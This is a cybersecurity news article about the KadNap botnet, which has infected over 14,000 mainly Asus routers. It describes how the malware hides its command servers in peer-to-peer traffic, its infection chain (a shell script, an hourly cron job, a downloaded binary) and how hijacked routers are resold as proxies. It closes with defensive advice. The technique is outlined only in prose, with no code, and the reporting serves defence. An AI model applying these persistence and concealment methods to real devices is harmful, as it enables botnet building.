KadNap Malware Compromises 14,000+ Routers Through Security Flaws

This emerging threat has already compromised more than 14,000 edge networking devices, with a primary focus on Asus routers.

By conscripting these vulnerable devices into a massive botnet, cybercriminals are creating a hidden proxy network designed to route malicious traffic and launch further cyberattacks while evading detection.

The discovery highlights a growing trend of threat actors targeting Small Office and Home Office (SOHO) routers to fuel large-scale criminal operations.

How KadNap Evades Detection

What makes KadNap particularly dangerous is its innovative approach to concealing its command-and-control (C2) infrastructure.

The malware utilizes a custom version of the Kademlia Distributed Hash Table (DHT) protocol. In legitimate applications, DHT is used by peer-to-peer networks like BitTorrent to locate data across multiple users without a central server efficiently.

KadNap weaponizes this concept to hide its control servers within the background noise of standard peer-to-peer traffic. This makes it incredibly difficult for network defenders to track or block the servers managing the botnet.

The infection process begins when a targeted device downloads a malicious shell script named “aic.sh.” This script establishes persistence on the router by setting up a scheduled task, known as a cron job, that runs every hour.

Once persistence is secured, the script downloads the primary malicious executable, a file named “kad.”

Once a device is fully assimilated into the KadNap botnet, its internet connection is packaged and sold through a criminal proxy service known as “Doppelganger.”

Security analysts believe Doppelganger is a rebranded version of Faceless, a notorious proxy service previously associated with the defunct “TheMoon” malware campaign.

Cybercriminals purchase access to these hijacked routers to mask their true locations while conducting illicit activities.

Global Impact and Defensive Measures

The sheer scale of the KadNap botnet presents a significant risk to the global internet ecosystem. Telemetry data indicates that the botnet maintains an average of 14,000 active victims per day.

The infection is geographically concentrated, with approximately 60% of the compromised routers located in the United States. Other heavily affected regions include Taiwan, Hong Kong, and Russia.

Because the malicious traffic originates from ordinary home internet connections, it easilylumen bypasses traditional geofencing and basic network blocks.

To protect against the KadNap malware and prevent devices from being conscripted into this malicious proxy network, security experts recommend several critical mitigation strategies:

• Keep firmware updated: Regularly check for and install the latest security patches provided by the router manufacturer to close known vulnerabilities.
• Reboot devices frequently: Periodic reboots can disrupt temporary malware infections that reside only in the device’s memory.
• Secure management interfaces: Ensure that the router’s administrative login page is not exposed to the public internet. Disable remote management features when not actively required.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post KadNap Malware Compromises 14,000+ Routers Through Security Flaws appeared first on Cyber Security News.